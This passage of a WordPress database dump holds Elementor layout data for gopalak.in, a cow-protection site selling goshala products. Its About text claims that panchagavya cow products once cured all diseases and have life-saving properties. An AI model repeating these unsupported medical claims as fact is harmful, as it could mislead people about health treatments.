here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\",\"title_color\":\"#43693F\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11372,1891,'_elementor_page_assets','a:0:{}'),(11375,1892,'_elementor_edit_mode','builder'),(11376,1892,'_elementor_template_type','wp-page'),(11377,1892,'_elementor_version','3.7.8'),(11378,1892,'_wp_page_template','elementor_canvas'),(11379,1892,'_elementor_data','[{\"id\":\"bd48cf8\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"a54ffbe\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"13df1e1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"e9cb50b\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"3e6d778\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"8b2632b\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b2360e0\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"497dcae\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"682b6d2\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"e793398\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"26193d5\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"21b2e7c\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"ed693bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"9ad2eca\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9c89a5d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"a0807d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b828571\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\",\"id\":1577,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0caef34\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.<\\/p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung \\/ cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today\\u2019s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise\\/marketing, they are not able to reach people even people want these best products<\\/p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation\\u2019s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold\\u2019s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25721f3\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b7dd35b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c9a8b6b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a3c36fb\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11380,1892,'_elementor_page_assets','a:0:{}'),(11385,1893,'_elementor_edit_mode','builder'),(11386,1893,'_elementor_template_type','wp-page'),(11387,1893,'_elementor_version','3.7.8'),(11388,1893,'_wp_page_template','elementor_canvas'),(11389,1893,'_elementor_data','[{\"id\":\"1b3f952\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0135c90\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"22f7707\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"7ccac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4a5c3c2\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"14ed504\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c17fb13\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"8bbe50b\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"80d9579\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"61d00ed\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c8dec05\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"32d56b3\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"921678d\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"75327ba\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e86e541\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1605bf1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"10265e7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-123.png\",\"id\":1725,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4aab555\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It\\u2019s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it\\u2019s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c479969\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ad82ec2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"61e999c\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[table id=1 \\/]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"117d94d\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"8a58209\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0459073\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f01ff4f\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11390,1893,'_elementor_page_assets','a:0:{}'),(11392,1894,'_wp_attached_file','2022/10/GOPALAK-COIN-2.png'),(11393,1894,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1000;s:6:\"height\";i:1000;s:4:\"file\";s:26:\"2022/10/GOPALAK-COIN-2.png\";s:8:\"filesize\";i:416554;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:26:\"GOPALAK-COIN-2-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:45215;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:26:\"GOPALAK-COIN-2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:16459;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:26:\"GOPALAK-COIN-2-768x768.png\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:239768;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:26:\"GOPALAK-COIN-2-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:50439;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:24:\"GOPALAK-COIN-2-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:3727;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:26:\"GOPALAK-COIN-2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:9536;}s:15:\"thaps-thumb-img\";a:5:{s:4:\"file\";s:24:\"GOPALAK-COIN-2-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:3510;}s:16:\"taiowc-thumb-img\";a:5:{s:4:\"file\";s:24:\"GOPALAK-COIN-2-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:3510;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s: